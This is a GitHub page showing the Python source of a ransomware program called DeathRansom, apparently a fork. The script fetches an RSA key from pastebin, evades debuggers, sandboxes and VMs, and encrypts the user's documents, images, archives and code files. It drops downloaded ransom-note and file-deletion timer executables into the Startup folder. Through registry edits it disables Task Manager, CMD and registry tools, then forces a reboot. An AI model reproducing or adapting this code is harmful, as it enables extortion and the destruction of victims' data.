forked from jorgetstechnology/DeathRansom
-
Notifications
You must be signed in to change notification settings - Fork 0
/
deathransom.py
81 lines (73 loc) · 3.32 KB
/
deathransom.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
from modules import rsa,learn_key
from modules.bypass import anti_debugger,anti_sandbox,anti_vm
from ctypes import *
import os,time,win32api,sys,wget,shutil
try:
PUBLIC_KEY = learn_key.public_key('https://pastebin.com/raw/FrNX6xHE')
except:
sys.exit(0)
def anti_disassembly():
a = 'adsadssadasdsgfaad'
ab = 'adsadssadasdsasdad'
ac = 'adsadssadasdsgfad'
ad = 'adsadssadasadfdsad'
av = 'adsadssadasdsasdad'
abx = 'adsadssadasdsagad'
acx = 'adsadssaadsadasdsad'
ada = 'adsadssadasdagsad'
aas = 'adsadsfssadasdsad'
ae = 'adsadsgsadasdsad'
ar = 'adfdfsadssadasdsad'
def download_ransom_request():
try:
dir_startup = 'C:\\Users\\{}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'.format(os.getenv('username'))
# Script that will show the ransom request
wget.download('mediafire.com',out=dir_startup+'ransom_request.exe')
shutil.copy(dir_startup+'ransom_request.exe','C:\\Users\\{}\\Desktop\\ransom_request.exe'.format(os.getenv('username')))
# Script that counts the 4 days to delete all files
wget.download('mediafire.com',out=dir_startup+'time_script.exe')
except:
pass
def disable_all():
try:
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableRegistryTools /d 1 /f')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableTaskMgr /d 1 /f')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableCMD /d 1 /f')
os.system('shutdown /r /f /t 3')
except:
os.system('shutdown /r /f /t 3')
def main():
anti_disassembly()
if anti_sandbox.check(0,0,1,0,1,1) == True:
pass
else:
print 'sandbox found'
if anti_debugger.check() == True:
pass
else:
print 'debugger found'
if anti_vm.check() == True:
pass
else:
print 'debugger found'
username = os.getenv('username')
path2crypt = 'C:\\Users\\' + username
valid_extension = [".pl",".7z",".rar",".m4a",".wma",".avi",".wmv",".d3dbsp",".sc2save",".sie",".sum",".bkp",".flv",".js",".raw",".jpeg",".tar",".zip",".tar.gz",".cmd",".key",".DOT",".docm",".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd", ".bmp"]
enc_files = rsa.files2crypt(path2crypt)
for file_pnt in enc_files:
if os.path.basename(file_pnt).endswith(".wannadie"):
pass
else:
extension = os.path.splitext(file_pnt)[1]
if extension in valid_extension:
try:
rsa.encryptar(str(file_pnt), PUBLIC_KEY)
except:
pass
with open('C:\\Users\\{}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\delete_ransom.bat'.format(os.getenv('username')),'w') as in_file:
file_path = os.path.splitext(os.path.abspath(__file__))
filename = file_path[0].split('.')[0]
in_file.write('del /Q /S /F {}'.format(str(file_path[0])+'.exe'))
download_ransom_request()
disable_all()
main()